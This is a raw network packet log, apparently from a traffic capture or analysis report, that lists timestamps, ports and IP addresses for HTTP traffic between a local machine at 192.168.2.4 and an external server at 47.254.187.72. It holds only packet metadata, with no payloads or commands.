                                                                            Jan 2, 2025 20:34:51.872539997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.875438929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875448942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875468016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875479937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875488997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875500917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.875502110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875519037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875530005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875530958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.875540972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.875550032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.875582933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.877865076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877876997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877887011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877897978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877907991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877918005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877919912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.877929926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877938986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.877945900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.877986908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.880599022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880610943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880621910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880634069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880645037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880649090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.880656004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880667925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880678892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.880688906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.880719900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885523081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885535002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885545015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885556936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885566950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885579109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885585070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885601044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885601997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885612965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885623932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885636091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885637045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885644913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885658026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885659933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885677099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885698080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885704041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885730028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885744095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885750055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885761023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885771036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.885772943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885792971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.885822058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.887635946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887689114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887697935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887715101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887728930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.887732029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887743950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887753963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887764931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.887769938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.887789965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.887803078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.888767958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888777971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888793945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888804913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888813972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888823986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888833046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.888835907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888847113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888853073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.888863087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.888890982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.888904095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.943320990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943389893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.943424940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943438053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943449020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943459988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943470955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943475008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.943481922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.943530083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.945240021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945256948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945267916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945277929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945283890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.945293903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945303917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.945303917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945316076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945324898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.945343971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.945363045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947134018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947144032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947154999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947170973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947180986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947186947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947226048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947252035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947261095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947272062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947283030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947293043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947302103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947318077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947318077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947330952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947341919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947348118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947351933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947380066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947398901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947419882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947455883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947474957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947511911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947737932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947748899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947765112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947782040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947793007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947794914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947803974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947820902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947829962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947844028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.947854996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947879076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.947896957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948643923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948663950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948674917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948698997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948719025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948720932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948729992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948748112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948755980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948767900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948769093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948776007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948780060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948807001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948831081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948946953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948956966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948972940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948987961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.948987961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.948998928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949014902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.949014902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949026108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949035883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949042082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.949047089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949054956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949064970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949068069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.949076891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949086905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949091911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.949098110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949107885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949112892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.949120045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.949136972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.949161053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.959368944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959382057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959393024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959404945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959415913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959418058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.959425926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959436893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.959445953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.959494114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.962265968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962282896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962295055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962305069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962316036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962316990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.962327003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962338924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962342978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.962347984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.962373018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.962390900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.964589119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964602947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964620113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964631081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964647055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964658976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.964677095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964678049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.964689016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964699030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.964708090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.964728117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.967406988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967418909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967428923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967438936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967449903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967462063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.967463017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967475891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967482090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.967485905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.967519999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972317934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972363949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972373962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972383976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972400904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972404003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972414017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972419977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972429991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972436905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972443104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972451925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972453117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972464085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972474098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972475052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972507954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972604990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972616911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972634077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972645044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972647905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972656012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972666025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.972671032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.972691059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.974447966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974458933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974468946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974482059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974493027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974493980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.974524975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.974546909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974556923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974567890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.974587917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.974605083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975486040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975552082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975553036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975563049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975579977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975581884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975591898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975596905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975603104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975614071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975614071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975631952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975661039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.975661039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.975693941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.042963028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043010950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043030024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043045044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043060064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043071032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043073893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043081999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043092966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043102980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043113947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043113947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043121099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043129921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043145895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043159008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043159962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043169022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043179035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043180943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043190002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043199062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043200970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043211937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043221951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043227911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043227911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043231964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043237925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043246984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043255091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043271065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043287992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043287992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043308973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043323994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043327093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043339014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043345928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043349028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043359995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043370008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043371916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043378115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043382883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043397903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043407917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043417931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043423891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043427944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043438911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043446064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043453932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.043463945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.043464899 CET804973047.254.187.72192.168.2.4
